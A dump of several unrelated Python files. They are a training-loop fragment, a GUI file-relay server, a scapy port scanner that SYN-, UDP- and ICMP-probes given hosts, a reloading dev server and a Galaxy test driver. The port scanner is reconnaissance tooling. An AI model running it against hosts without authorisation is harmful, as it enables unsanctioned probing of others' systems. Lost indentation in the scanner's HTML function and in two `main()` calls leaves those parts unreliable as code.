            # message like every other log call in this file.
            logger.info('loss: {0}'.format(np.mean(losses)))
        learning_rate_scheduler.step()
        if epoch % arguments.save_every == 0 and epoch != 0:
            logger.info('Saving model.')
            save_model(tcn, model_filename(arguments.model_name, epoch), arguments.model_folder)
    worker.join()
if __name__ == '__main__':
main()
|
server.py | import socket
from threading import Thread
import traceback
import json
import struct
from copy import deepcopy
import random
from tkinter import *
from GUI import Window
from queue import Queue
buf_size = 1024
class Server(Thread):
    """Relay server for a file-transfer GUI demo.

    Accepts TCP control connections from clients (client list requests,
    send/accept handshakes, JSON messages length-prefixed with a 4-byte
    big-endian size) and forwards UDP data packets from an accepted
    sender to its receiver.
    """

    def __init__(self, root):
        super().__init__()
        self.host = '127.0.0.1'
        # Random unprivileged port shared by both the TCP and UDP sockets.
        self.port = random.randrange(1024, 9999)
        self.client_list = []            # connected client addresses
        self.connection_list = {}        # client address -> TCP connection
        self.sending_receiving_list = []
        self.signal = False              # True while UDP data is flowing
        # keeps a tuple of 3 elements:
        # 1.sending client address
        # 2.receiving client address
        # 3.whether the request has been accepted or not
        ############################################
        # create a socket with ipv4 and TCP protocol
        self.tcp_soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.udp_soc = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.tcp_soc.bind((self.host, self.port))
        self.udp_soc.bind((self.host, self.port))
        self.root = root
        self.tcp_soc.listen(4)

    def run(self):
        """Thread entry point: open the server GUI window, start the UDP
        relay thread, then accept TCP clients forever."""
        root1 = Toplevel(self.root)
        root1.wm_geometry("800x500")
        self.sender_window = Window(root1, "server")
        try:
            Thread(target=self.handle_udp_messages).start()
        except:
            print("UDP Thread did not start.")
            traceback.print_exc()
        while True:
            # One handler thread per accepted TCP client.
            connection, client_address = self.tcp_soc.accept()
            self.client_list.append(client_address)
            self.connection_list[client_address] = connection
            self.sender_window.server_init_window(self.client_list)
            print("server: Connected with " + client_address[0] + ":" + str(client_address[1]))
            try:
                Thread(target=self.handle_tcp_messages, args=(connection, client_address)).start()
            except:
                self.sender_window.server_warning()
                print("TCP Thread did not start.")
                traceback.print_exc()

    def handle_tcp_messages(self, connection, client_address):
        """Per-client loop: read length-prefixed JSON requests and reply.

        Supported requests: GetClintList (sic), RequestToSend,
        AcceptRequest; anything else gets InvalidRequest and the
        connection is closed.
        """
        # get tcp messages
        while True:
            # Read the 4-byte big-endian length prefix, then the body.
            buf = b''
            while len(buf) < 4:
                buf += connection.recv(4 - len(buf))
            length = struct.unpack('!I', buf)[0]
            buf = b''
            while len(buf) < length:
                buf += connection.recv(length - len(buf))
            msg = json.loads(buf.decode('utf-8'))
            self.sender_window.server_messages(msg.get('request'), client_address[1])
            print('server:', str(client_address[1]), '-->', msg)
            if msg.get('request') == 'GetClintList':
                # Reply with every known client except the requester.
                client_list_copy = deepcopy(self.client_list)
                client_list_copy.remove(client_address)
                packet = json.dumps({'ReplyClientList': client_list_copy}).encode('utf-8')
                self.sender_window.server_messages(packet, 'server')
                length = struct.pack('!I', len(packet))
                packet = length + packet
                connection.sendall(packet)
            elif msg.get('request') == 'RequestToSend':
                packet = msg
                self.sender_window.server_messages(packet, client_address[1])
                # self.gui(client_address[0] + str(client_address[1]) + ' sent' + '<RequestToSend>')
                to = packet.pop('to')
                # check the validity of the receiving client address
                if (to[0], to[1]) in self.client_list:
                    # Forward the request to the receiver, stamped with
                    # the sender's address, and record the pending pair.
                    packet['from'] = client_address
                    packet = json.dumps(packet).encode('utf-8')
                    length = struct.pack('!I', len(packet))
                    packet = length + packet
                    dest = (to[0], to[1])
                    self.sender_window.server_messages(packet, 'server' , to)
                    self.connection_list[dest].sendall(packet)
                    self.sending_receiving_list.append((client_address, dest, False))
                else:
                    msg = {
                        'request': 'NoSuchClient'
                    }
                    packet = json.dumps(msg).encode('utf-8')
                    length = struct.pack('!I', len(packet))
                    packet = length + packet
                    connection.sendall(packet)
                    connection.close()
            elif msg.get('request') == 'AcceptRequest':
                packet = msg
                # check if this client is allowed to send an accept request and who is the sender
                for element in self.sending_receiving_list:
                    if element[1] == client_address:
                        if element[2] is False:
                            # allowed
                            to = element[0]
                            packet['from'] = client_address
                            packet = json.dumps(packet).encode('utf-8')
                            length = struct.pack('!I', len(packet))
                            packet = length + packet
                            i = self.sending_receiving_list.index((to, client_address, False))
                            # update the sending receiving list
                            self.sending_receiving_list[i] = (to, client_address, True)
                            self.connection_list[to].sendall(packet)
                        else:
                            # Pair already accepted — duplicate accept is invalid.
                            msg = {
                                'request': 'InvalidRequest'
                            }
                            packet = json.dumps(msg).encode('utf-8')
                            length = struct.pack('!I', len(packet))
                            packet = length + packet
                            connection.sendall(packet)
                            connection.close()
                        break
                else:
                    # No pending request addressed to this client.
                    msg = {
                        'request': 'InvalidRequest'
                    }
                    packet = json.dumps(msg).encode('utf-8')
                    length = struct.pack('!I', len(packet))
                    packet = length + packet
                    connection.sendall(packet)
                    connection.close()
            else:
                msg = {
                    'request': 'InvalidRequest'
                }
                packet = json.dumps(msg).encode('utf-8')
                length = struct.pack('!I', len(packet))
                packet = length + packet
                connection.sendall(packet)
                connection.close()

    def receive_udp(self, queue):
        """Pump datagrams from the UDP socket into *queue* until a
        2-second receive timeout fires, then clear ``self.signal``.

        NOTE(review): the first recvfrom happens before the timeout is
        set, so it can block indefinitely — confirm this is intended.
        """
        data, address = self.udp_soc.recvfrom(buf_size)
        try:
            while data:
                self.signal = True
                queue.put((data, address))
                data, address = self.udp_soc.recvfrom(buf_size)
                self.udp_soc.settimeout(2)
        except socket.timeout:
            self.signal = False

    def handle_udp_messages(self):
        """Relay queued UDP datagrams from accepted senders to their
        registered receivers while data keeps arriving."""
        # get udp messages
        queue = Queue()
        self.signal = False
        try:
            Thread(target=self.receive_udp, args=(queue, )).start()
        except:
            print("Auto client list Thread did not start.")
            traceback.print_exc()
        # Busy-wait until the first datagram arrives.
        while not self.signal:
            pass
        while self.signal:
            while not queue.empty():
                data, address = queue.get()
                # Only forward for sender/receiver pairs that were accepted.
                for element in self.sending_receiving_list:
                    if element[0] == address and element[2] is True:
                        receiving_client_address = element[1]
                        self.udp_soc.sendto(data, receiving_client_address)
|
PyPortScanner.py | import argparse
import logging
import time
import Queue
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
from threading import *
import sys
# Where you want to save your html file
html_file = "dashboard.html"
src_port = 400
# Thread dictionary
Hosts = dict()
# My Host class which makes working with threads easier
# My Host class which makes working with threads easier
class Host:
    """Scan results for one target host.

    All result containers are created per-instance in __init__.  The
    original version also declared them as class-level mutable
    attributes (``tcp_ports = set()`` etc.), which is a shared-state
    hazard: any code touching the class attribute would mix results
    across hosts.  ``ICMP_ping`` in particular was only a class
    attribute; it is now initialized per instance as well.
    """

    def __init__(self, pname):
        self.name = pname            # host name or IP being scanned
        self.tcp_ports = set()       # TCP ports observed open (SYN/ACK)
        self.udp_ports = set()       # UDP ports presumed open (no reply)
        self.traceroute = set()      # "ttl -> hop" strings
        self.ICMP_ping = False       # True once an ICMP echo succeeds
def tcpScan(tgtHost, tgtPort):
    # This is where we perform the TCP scan
    # SYN probe: a TCP reply with flags 0x12 (SYN/ACK) marks the port open.
    tcp_connect_scan_resp = sr1(IP(dst=tgtHost)/TCP(sport=src_port,dport=tgtPort,flags="S"),timeout=3, verbose=0)
    # If a bad response, than it was closed
    # NOTE: the string type-name comparison is Python-2 specific.
    if(str(type(tcp_connect_scan_resp))!="<type 'NoneType'>") and tcp_connect_scan_resp.haslayer(TCP):
        if(tcp_connect_scan_resp.getlayer(TCP).flags == 0x12):
            Hosts[tgtHost].tcp_ports.add(tgtPort)
def udpScan(tgtHost, tgtPort):
    # Sends an UDP request, if no response is received the port is identified as being open
    ans = sr1(IP(dst=tgtHost)/UDP(dport=tgtPort),timeout=5,verbose=0)
    time.sleep(1)
    # We can identify all ports that don't return an ICMP host-unreachable reply
    # (silence is treated as open|filtered for UDP).
    if ans == None:
        Hosts[tgtHost].udp_ports.add(tgtPort)
def icmpScan(tgtHost, tgtPort):
    # Sends an ICMP ping
    ICMP_connect_scan_resp,unans=sr(IP(dst=tgtHost)/ICMP(), verbose=0)
    # If it comes back successfully than it was a successful ICMP ping
    # NOTE(review): sr() returns a results object, not None, so this
    # type-name check looks always-true — confirm against scapy docs.
    if(str(type(ICMP_connect_scan_resp))!="<type 'NoneType'>"):
        Hosts[tgtHost].ICMP_ping = True
def traceRoute(tgtHost, tgtPort):
    # ICMP-based traceroute: raise the TTL one hop at a time and record
    # each router that answers with "time exceeded" until the target
    # itself replies with an echo reply.
    ttl = 1
    while 1:
        p=sr1(IP(dst=tgtHost,ttl=ttl)/ICMP(id=os.getpid()), verbose=0)
        # if time exceeded due to TTL exceeded
        if p[ICMP].type == 11 and p[ICMP].code == 0:
            traceroute = "{} -> {}".format(ttl, p.src)
            Hosts[tgtHost].traceroute.add(traceroute)
            ttl += 1
        # Or if the type is correct
        elif p[ICMP].type == 0:
            # Echo reply: we reached the destination host.
            traceroute = "{} -> {}".format(ttl, p.src)
            Hosts[tgtHost].traceroute.add(traceroute)
            break
def portScan(tgtHosts, tgtPorts):
    # Simple for loop where I run through all the hosts and ports
    # and thread them
    for tgtHost in tgtHosts:
        for tgtPort in tgtPorts:
            t1 = Thread(target=tcpScan, args=(tgtHost, int(tgtPort)))
            t1.start()
            t2 = Thread(target=udpScan, args=(tgtHost, int(tgtPort)))
            t2.start()
            t3 = Thread(target=icmpScan, args=(tgtHost, 11))
            t3.start()
            t4 = Thread(target=traceRoute, args=(tgtHost, 7))
            t4.start()
    # Fixed grace period for the scan threads to finish;
    # no join() is performed on the individual threads.
    time.sleep(20)
def printHosts():
    # A simple printing function for the command line
    # Dumps every Host's ping status, open TCP/UDP ports and traceroute,
    # then terminates the process (sys.exit is intentional here — this
    # is the last step of the scan).
    for host_name in Hosts:
        host = Hosts[host_name]
        print "[+] Host: {}".format(host.name)
        if (host.ICMP_ping):
            print "[+] Successful ICMP Ping"
        else:
            print "[-] Could not be ICMP Pinged"
        for tcp_port in host.tcp_ports:
            print "[+] TCP Ports: {} OPEN".format(tcp_port)
        for udp_port in host.udp_ports:
            print "[+] UDP Ports: {} OPEN".format(udp_port)
        for traceroute in host.traceroute:
            print "[+] TraceRoute: {}".format(traceroute)
    print "[+] Finished"
    sys.exit(0)
def htmlHosts():
dirty_html = ""
# This is a long and convoluted way of printing everything to an HTML file
begin = """
<!DOCTYPE html>
<html>
<head>
<title>Hosts</title>
<style>
select {
background-color: #507FB3;
color: #F0F9FC;
font-size: 14px;
}
a {
color: white;
}
</style>
</head>
<body style="background-color:#0151AB">
"""
dirty_html += begin
for host_name in Hosts:
host = Hosts[host_name]
ICMP_string = ""
if (host.ICMP_ping):
ICMP_string = "Successful"
else:
ICMP_string = "Failed"
host_html = """
<center>
<h1 style="color:#ffb7b9;text-decoration: underline;">
{}</h1>
</center>
<table border= "1" class="sortable" align="center" style="color:#F0F9FC;font-size:19px">
<tr style="font-weight:bold; font-size:24px; text-decoration:underline; color: #FFEFCC">
<td>ICMP Ping</td>
</tr>
<tr>
<td>{}</td></tr>
""".format(host_name, ICMP_string)
dirty_html += host_html
host_html = """
<tr style="font-weight:bold; font-size:24px; text-decoration:underline; color: #FFEFCC">
<td>TCP Ports Open</td>
</tr>
<tr>
<td>
"""
for tcp_port in host.tcp_ports:
host_html += "{} ".format(tcp_port)
host_html += "</td></tr>"
dirty_html += host_html
host_html = """
<tr style="font-weight:bold; font-size:24px; text-decoration:underline; color: #FFEFCC">
<td>UDP Ports Open</td>
</tr>
<tr>
<td>
"""
for udp_port in host.udp_ports:
host_html += "{} ".format(udp_port)
host_html += "</td></tr>"
dirty_html += host_html
host_html = """
<tr style="font-weight:bold; font-size:24px; text-decoration:underline; color: #FFEFCC">
<td>TraceRoute</td>
</tr>
<tr>
<td>
"""
for traceroute in host.traceroute:
host_html += "{} ".format(traceroute)
host_html += "</td></tr></table>"
dirty_html += host_html
dirty_html += "</body></html>"
html_file = open(html_file, "w")
html_file.write(dirty_html)
html_file.close()
print "[+] Html Written"
def main(): #Uses arg parse, gets a list of hosts or ports, pretty simple to use
    # Entry point: parse -H hosts and -p ports, register a Host record
    # per target, run the threaded scans, then emit HTML and console output.
    parser = argparse.ArgumentParser(description = 'A simple Python port scanner.')
    parser.add_argument('-H', type = str, nargs = '+', help = 'website or ip address')
    parser.add_argument('-p', metavar = 'N', type = int, nargs = '+', help = 'one or several port numbers')
    args = parser.parse_args()
    tgtHosts = args.H
    tgtPorts = args.p
    if (tgtHosts == None) or(tgtPorts == None):
        print '[-] You must specify a target host and port[s].'
        exit(0)
    for tgtHost in tgtHosts:
        new_host = Host(tgtHost)
        Hosts[tgtHost] = new_host
    portScan(tgtHosts, tgtPorts)
    htmlHosts()
    printHosts()
if __name__ == '__main__':
main()
|
devserver.py | #!/usr/bin/env python
"""
To get quick feedback this implements an automatically reloading web server
to be run locally.
Reloading functionality is taken from the fabulous
`Werkzeug WSGI toolkit <http://www.pocoo.org/projects/werkzeug/#werkzeug>`
"""
import logging
import mimetypes
import os
import subprocess
import sys
import time
import threading
from wsgiref import simple_server, util
log = logging.getLogger(__name__)
RUN_MAIN_ENV_KEY = 'RUN_MAIN_ENV_KEY'
# todo refactor into generalized class
# todo use local.path object throughout
def restart_with_reloader():
    """Spawn a new Python interpreter with the same arguments as this one,
    but running the reloader thread.

    Blocks until a child exits with a code other than 3 and returns that code.
    """
    while True:
        log.info("***restarting with reloader***")
        child_env = dict(os.environ, **{RUN_MAIN_ENV_KEY: 'true'})
        status = subprocess.call([sys.executable] + sys.argv, env=child_env)
        # Exit code 3 means "files changed, please restart me"; anything else
        # is a real exit.
        if status != 3:
            return status
def run_with_reloader(main_func, pathToWatch, pathToIgnore,
                      cleanFileNames, cleanPaths):
    """Run the given function in an independent python interpreter."""
    import signal
    # Let SIGTERM terminate the process cleanly.
    signal.signal(signal.SIGTERM, lambda *args: sys.exit(0))
    is_reloader_child = os.environ.get(RUN_MAIN_ENV_KEY) == 'true'
    if is_reloader_child:
        # Child: run the real work in a background thread while this thread
        # watches the filesystem for changes.
        worker = threading.Thread(target=main_func)
        worker.start()
        try:
            reloader_loop(pathToWatch, pathToIgnore,
                          cleanFileNames, cleanPaths)
        except KeyboardInterrupt:
            return
    # Parent: keep respawning the child until it stops asking for a reload.
    try:
        sys.exit(restart_with_reloader())
    except KeyboardInterrupt:
        pass
def reloader_loop(pathToWatch, pathToIgnore, cleanFileNames, cleanPaths,
                  interval=0.5):
    """When this function is run from the main thread, it will force other
    threads to exit when any files passed in here change..

    Copyright notice: this function is based on ``_reloader_stat_loop()``
    from Werkzeug which is based on autoreload.py
    from CherryPy trac which originated from WSGIKit which is now dead.

    :param LocalPath pathToWatch: path of the directory to be watched.
    :param LocalPath pathToIgnore: subtree excluded from watching.
    :param cleanFileNames: "ALL" or a list of file names that trigger a clean.
    :param cleanPaths: paths deleted when a clean is triggered.
    :param float interval: seconds to sleep between filesystem scans.
    """
    pathTimeMap = {}
    while True:
        # for p in cleanPaths:
        #     if not p.exists():
        #         log.info("%s does not exist: trigger build..." % (p))
        #         sys.exit(3)
        paths = [p for p in pathToWatch.walk(
            filter=lambda p: "\\." not in p._path and "/." not in p._path)
            if not p._path.startswith(pathToIgnore._path) and
            "\\." not in p._path and "/." not in p._path and not
            p.isdir()]
        changedPaths = []
        for filePath in paths:
            try:
                mtime = filePath.stat().st_mtime
            except OSError:
                log.warning("problem with %s" % (filePath), exc_info=True)
                continue
            oldTime = pathTimeMap.get(filePath)
            if oldTime is None:
                pathTimeMap[filePath] = mtime
                continue
            elif mtime > oldTime:
                # changedPaths collects plain file *names* (str), not path objects.
                changedPaths.append(filePath.basename)
                if cleanFileNames == "ALL":
                    break
        if changedPaths:
            # fixme handle changes in build dir intelligently (query git)
            log.info("detected changes in %s: reloading" % (changedPaths))
            # BUG FIX: changedPaths already holds basenames (strings); the old
            # ``[b.basename for b in changedPaths]`` raised AttributeError as
            # soon as a non-"ALL" clean list was configured.
            if (cleanFileNames == "ALL" or
                    any(n in changedPaths for n in cleanFileNames)):
                log.info("cleaning necessary in %s" % (cleanPaths))
                for path in cleanPaths:
                    log.info("cleaning %s" % (path))
                    path.delete()
            log.info("trigger build ...")
            sys.exit(3)
        time.sleep(interval)
def make_server(path, port):
    """Build a wsgiref server that serves static files from ``path`` on ``port``."""
    def minimal_wsgi_app(environ, respond):
        """simple wsgi app to serve html files"""
        fn = os.path.join(path, environ['PATH_INFO'][1:])
        # Requests without a file extension are treated as directories.
        if '.' not in fn.split(os.path.sep)[-1]:
            fn = os.path.join(fn, 'index.html')
        type_ = mimetypes.guess_type(fn)[0]
        if os.path.exists(fn):
            # BUG FIX: guess_type may return None; fall back to a generic type
            # rather than emitting an invalid ``Content-Type: None`` header.
            respond('200 OK', [('Content-Type', type_ or 'application/octet-stream')])
            return util.FileWrapper(open(fn, "rb"))
        respond('404 Not Found', [('Content-Type', 'text/plain')])
        # BUG FIX: WSGI response bodies must be bytes under Python 3 (PEP 3333);
        # returning a str made wsgiref error out on the 404 path.
        return [b'404 not found']
    return simple_server.make_server('', port, minimal_wsgi_app)
def serve_with_reloader(
        serveFromPath, port, changedCallback, pathToWatch, pathToIgnore,
        cleanFileNames=None, cleanPaths=None):
    """
    :param serveFromPath: path to the folder to be served
    :param pathToWatch: path to watch recursively for changed files
    :param port: port to be served on
    :param changedCallback: function to be called if a monitored file changes
    :param pathToIgnore: don't watch this path for changes
    :param cleanFileNames: list of filenames that should trigger a full clean
    :param cleanPaths: paths to delete on a full clean
    """
    def build_then_serve():
        """Invoke the change callback once, then serve forever."""
        result = changedCallback()
        log.info("call %s -> %s" % (changedCallback.__name__, result))
        server = make_server(serveFromPath._path, port)
        log.info("serve %s on http://localhost:%s, control-C to stop" %
                 (serveFromPath, port))
        server.serve_forever()

    log.info("Serve while watching folder %s" % (pathToWatch))
    run_with_reloader(build_then_serve, pathToWatch, pathToIgnore,
                      cleanFileNames or [], cleanPaths or [])
|
driver_util.py | """Scripts for drivers of Galaxy functional tests."""
import http.client
import logging
import os
import random
import re
import shlex
import shutil
import signal
import socket
import string
import subprocess
import sys
import tempfile
import threading
import time
from typing import Optional
from urllib.parse import urlparse
import nose.config
import nose.core
import nose.loader
import nose.plugins.manager
import yaml
from paste import httpserver
from galaxy.app import UniverseApplication as GalaxyUniverseApplication
from galaxy.config import LOGGING_CONFIG_DEFAULT
from galaxy.model import mapping
from galaxy.model.database_utils import (
create_database,
database_exists,
)
from galaxy.model.tool_shed_install import mapping as toolshed_mapping
from galaxy.tool_util.verify.interactor import (
GalaxyInteractorApi,
verify_tool,
)
from galaxy.util import (
asbool,
download_to_file,
galaxy_directory,
)
from galaxy.util.properties import load_app_properties
from galaxy.webapps.galaxy import buildapp
from galaxy_test.base.api_util import (
get_admin_api_key,
get_user_api_key,
)
from galaxy_test.base.env import (
DEFAULT_WEB_HOST,
target_url_parts,
)
from galaxy_test.base.instrument import StructuredTestDataPlugin
from galaxy_test.base.nose_util import run
from tool_shed.webapp.app import UniverseApplication as ToolshedUniverseApplication
from .test_logging import logging_config_file
galaxy_root = galaxy_directory()
DEFAULT_CONFIG_PREFIX = "GALAXY"
GALAXY_TEST_DIRECTORY = os.path.join(galaxy_root, "test")
GALAXY_TEST_FILE_DIR = "test-data,https://github.com/galaxyproject/galaxy-test-data.git"
TOOL_SHED_TEST_DATA = os.path.join(galaxy_root, "lib", "tool_shed", "test", "test_data")
TEST_WEBHOOKS_DIR = os.path.join(galaxy_root, "test", "functional", "webhooks")
FRAMEWORK_TOOLS_DIR = os.path.join(GALAXY_TEST_DIRECTORY, "functional", "tools")
FRAMEWORK_UPLOAD_TOOL_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "upload_tool_conf.xml")
FRAMEWORK_SAMPLE_TOOLS_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "samples_tool_conf.xml")
FRAMEWORK_DATATYPES_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "sample_datatypes_conf.xml")
MIGRATED_TOOL_PANEL_CONFIG = "config/migrated_tools_conf.xml"
INSTALLED_TOOL_PANEL_CONFIGS = [os.environ.get("GALAXY_TEST_SHED_TOOL_CONF", "config/shed_tool_conf.xml")]
REALTIME_PROXY_TEMPLATE = string.Template(
r"""
uwsgi:
http-raw-body: true
interactivetools_map: $tempdir/interactivetools_map.sqlite
python-raw: scripts/interactivetools/key_type_token_mapping.py
# if interactive tool path, jump to interactive tool, else skip to
# endendend (default uwsgi params).
route-host: ^([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)-([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)\.([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)\.(interactivetool\.$test_host:$test_port)$ goto:interactivetool
route-run: goto:endendend
route-label: interactivetool
route-host: ^([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)-([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)\.([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)\.(interactivetool\.$test_host:$test_port)$ rpcvar:TARGET_HOST rtt_key_type_token_mapper_cached $1 $3 $2 $4 $0 5
route-if-not: empty:${TARGET_HOST} httpdumb:${TARGET_HOST}
route: .* break:404 Not Found
route-label: endendend
"""
)
DEFAULT_LOCALES = "en"
USE_UVICORN = asbool(os.environ.get("GALAXY_TEST_USE_UVICORN", True))
log = logging.getLogger("test_driver")
# Global variables to pass database contexts around - only needed for older
# Tool Shed twill tests that didn't utilize the API for such interactions.
galaxy_context = None
tool_shed_context = None
install_context = None
def setup_tool_shed_tmp_dir():
    """Return (creating and exporting if needed) the tool shed test temp dir.

    Temporary sub-directories for the hgweb.config file, the database, new
    repositories, etc. are created within this directory.  Because the tool
    shed browses repository contents over HTTP, the real path must not contain
    characters that are invalid in URLs.
    """
    tmp_dir = os.environ.get("TOOL_SHED_TEST_TMP_DIR", None)
    if tmp_dir is None:
        tmp_dir = os.path.realpath(tempfile.mkdtemp())
    os.environ["TOOL_SHED_TEST_TMP_DIR"] = tmp_dir
    return tmp_dir
def get_galaxy_test_tmp_dir():
    """Create test directory for use by Galaxy server being setup for testing."""
    configured = os.environ.get("GALAXY_TEST_TMP_DIR")
    # Fall back to a fresh temporary directory when none is configured.
    return tempfile.mkdtemp() if configured is None else configured
def configure_environment():
    """Hack up environment for test cases.

    Fills in fallback values for locale and tool shed test data, then marks
    the environment as configured.
    """
    environ = os.environ
    # no op remove if unused
    if "HTTP_ACCEPT_LANGUAGE" not in environ:
        environ["HTTP_ACCEPT_LANGUAGE"] = DEFAULT_LOCALES
    # Used by get_filename in tool shed's twilltestcase.
    if "TOOL_SHED_TEST_FILE_DIR" not in environ:
        environ["TOOL_SHED_TEST_FILE_DIR"] = TOOL_SHED_TEST_DATA
    environ["GALAXY_TEST_ENVIRONMENT_CONFIGURED"] = "1"
def build_logger():
    """Build a logger for test driver script."""
    # Reuses the module-level "test_driver" logger rather than creating a new one.
    return log
def ensure_test_file_dir_set():
    """Ensure GALAXY_TEST_FILE_DIR setup in environment for test data resolver.

    Return first directory for backward compat.
    """
    file_dirs = os.environ.get("GALAXY_TEST_FILE_DIR", GALAXY_TEST_FILE_DIR)
    os.environ["GALAXY_TEST_FILE_DIR"] = file_dirs
    # The setting is a comma-separated list; only the first entry is returned.
    first_test_file_dir, _, _ = file_dirs.partition(",")
    return first_test_file_dir
def setup_galaxy_config(
    tmpdir,
    use_test_file_dir=False,
    default_install_db_merged=True,
    default_tool_data_table_config_path=None,
    default_shed_tool_data_table_config=None,
    default_job_config_file=None,
    enable_tool_shed_check=False,
    default_tool_conf=None,
    shed_tool_conf=None,
    datatypes_conf=None,
    update_integrated_tool_panel=False,
    prefer_template_database=False,
    log_format=None,
    conda_auto_init=False,
    conda_auto_install=False,
    use_shared_connection_for_amqp=False,
    allow_tool_conf_override: bool = True,
    allow_path_paste=False,
):
    """Setup environment and build config for test Galaxy instance.

    Creates scratch directories under ``tmpdir`` (templates, new files, job
    working directories, data-manager data), resolves tool/data-manager/table
    configs relative to the Galaxy root, merges in database settings, and
    returns a plain dict of Galaxy configuration options.  Many defaults can
    be overridden via ``GALAXY_TEST_*`` environment variables.

    NOTE(review): ``log_format`` is accepted but not referenced in this body —
    possibly consumed elsewhere or dead; confirm before removing.
    """
    # For certain docker operations this needs to be evaluated out - e.g. for cwltool.
    tmpdir = os.path.realpath(tmpdir)
    if not os.path.exists(tmpdir):
        os.makedirs(tmpdir)
    template_cache_path = tempfile.mkdtemp(prefix="compiled_templates_", dir=tmpdir)
    new_file_path = tempfile.mkdtemp(prefix="new_files_path_", dir=tmpdir)
    job_working_directory = tempfile.mkdtemp(prefix="job_working_directory_", dir=tmpdir)
    user_library_import_dir: Optional[str]
    if use_test_file_dir:
        first_test_file_dir = ensure_test_file_dir_set()
        if not os.path.isabs(first_test_file_dir):
            first_test_file_dir = os.path.join(galaxy_root, first_test_file_dir)
        library_import_dir = first_test_file_dir
        import_dir = os.path.join(first_test_file_dir, "users")
        if os.path.exists(import_dir):
            user_library_import_dir = import_dir
        else:
            user_library_import_dir = None
    else:
        user_library_import_dir = None
        library_import_dir = None
    job_config_file = os.environ.get("GALAXY_TEST_JOB_CONFIG_FILE", default_job_config_file)
    tool_path = os.environ.get("GALAXY_TEST_TOOL_PATH", "tools")
    tool_data_table_config_path = _tool_data_table_config_path(default_tool_data_table_config_path)
    # Prefer a checked-in data manager config (relative to cwd) when present;
    # the functional-test sample config is always appended.
    default_data_manager_config = None
    for data_manager_config in ["config/data_manager_conf.xml", "data_manager_conf.xml"]:
        if os.path.exists(data_manager_config):
            default_data_manager_config = data_manager_config
    data_manager_config_file = "test/functional/tools/sample_data_manager_conf.xml"
    if default_data_manager_config is not None:
        data_manager_config_file = f"{default_data_manager_config},{data_manager_config_file}"
    master_api_key = get_admin_api_key()
    cleanup_job = (
        "never"
        if ("GALAXY_TEST_NO_CLEANUP" in os.environ or "TOOL_SHED_TEST_NO_CLEANUP" in os.environ)
        else "onsuccess"
    )
    # Data Manager testing temp path
    # For storing Data Manager outputs and .loc files so that real ones don't get clobbered
    galaxy_data_manager_data_path = tempfile.mkdtemp(prefix="data_manager_tool-data", dir=tmpdir)
    if allow_tool_conf_override:
        tool_conf = os.environ.get("GALAXY_TEST_TOOL_CONF", default_tool_conf)
    else:
        tool_conf = default_tool_conf
    conda_auto_install = os.environ.get("GALAXY_TEST_CONDA_AUTO_INSTALL", conda_auto_install)
    conda_auto_init = os.environ.get("GALAXY_TEST_CONDA_AUTO_INIT", conda_auto_init)
    conda_prefix = os.environ.get("GALAXY_TEST_CONDA_PREFIX")
    if tool_conf is None:
        # As a fallback always at least allow upload.
        tool_conf = FRAMEWORK_UPLOAD_TOOL_CONF
    if shed_tool_conf is not None:
        tool_conf = f"{tool_conf},{shed_tool_conf}"
    # Resolve these paths w.r.t. galaxy root; otherwise galaxy's config system will resolve them w.r.t.
    # their parent directories, as per schema.
    data_manager_config_file = _resolve_relative_config_paths(data_manager_config_file)
    tool_config_file = _resolve_relative_config_paths(tool_conf)
    tool_data_table_config_path = _resolve_relative_config_paths(tool_data_table_config_path)
    config = dict(
        admin_users="test@bx.psu.edu",
        allow_library_path_paste=True,
        allow_path_paste=allow_path_paste,
        allow_user_creation=True,
        allow_user_deletion=True,
        api_allow_run_as="test@bx.psu.edu",
        auto_configure_logging=logging_config_file is None,
        chunk_upload_size=100,
        conda_prefix=conda_prefix,
        conda_auto_init=conda_auto_init,
        conda_auto_install=conda_auto_install,
        cleanup_job=cleanup_job,
        retry_metadata_internally=False,
        data_dir=tmpdir,
        data_manager_config_file=data_manager_config_file,
        enable_beta_tool_formats=True,
        expose_dataset_path=True,
        ftp_upload_purge=False,
        galaxy_data_manager_data_path=galaxy_data_manager_data_path,
        id_secret="changethisinproductiontoo",
        job_config_file=job_config_file,
        job_working_directory=job_working_directory,
        library_import_dir=library_import_dir,
        log_destination="stdout",
        new_file_path=new_file_path,
        override_tempdir=False,
        master_api_key=master_api_key,
        running_functional_tests=True,
        template_cache_path=template_cache_path,
        tool_config_file=tool_config_file,
        tool_data_table_config_path=tool_data_table_config_path,
        tool_parse_help=False,
        tool_path=tool_path,
        update_integrated_tool_panel=update_integrated_tool_panel,
        use_tasked_jobs=True,
        use_heartbeat=False,
        user_library_import_dir=user_library_import_dir,
        webhooks_dir=TEST_WEBHOOKS_DIR,
        logging=LOGGING_CONFIG_DEFAULT,
        monitor_thread_join_timeout=5,
        object_store_store_by="uuid",
        simplified_workflow_run_ui="off",
    )
    if default_shed_tool_data_table_config:
        config["shed_tool_data_table_config"] = default_shed_tool_data_table_config
    if not use_shared_connection_for_amqp:
        config[
            "amqp_internal_connection"
        ] = f"sqlalchemy+sqlite:///{os.path.join(tmpdir, 'control.sqlite')}?isolation_level=IMMEDIATE"
    config.update(database_conf(tmpdir, prefer_template_database=prefer_template_database))
    config.update(install_database_conf(tmpdir, default_merged=default_install_db_merged))
    if asbool(os.environ.get("GALAXY_TEST_USE_HIERARCHICAL_OBJECT_STORE")):
        # Write a two-backend hierarchical object store config under tmpdir.
        object_store_config = os.path.join(tmpdir, "object_store_conf.yml")
        with open(object_store_config, "w") as f:
            contents = """
type: hierarchical
backends:
  - id: files1
    type: disk
    weight: 1
    files_dir: "${temp_directory}/files1"
    extra_dirs:
      - type: temp
        path: "${temp_directory}/tmp1"
      - type: job_work
        path: "${temp_directory}/job_working_directory1"
  - id: files2
    type: disk
    weight: 1
    files_dir: "${temp_directory}/files2"
    extra_dirs:
      - type: temp
        path: "${temp_directory}/tmp2"
      - type: job_work
        path: "${temp_directory}/job_working_directory2"
"""
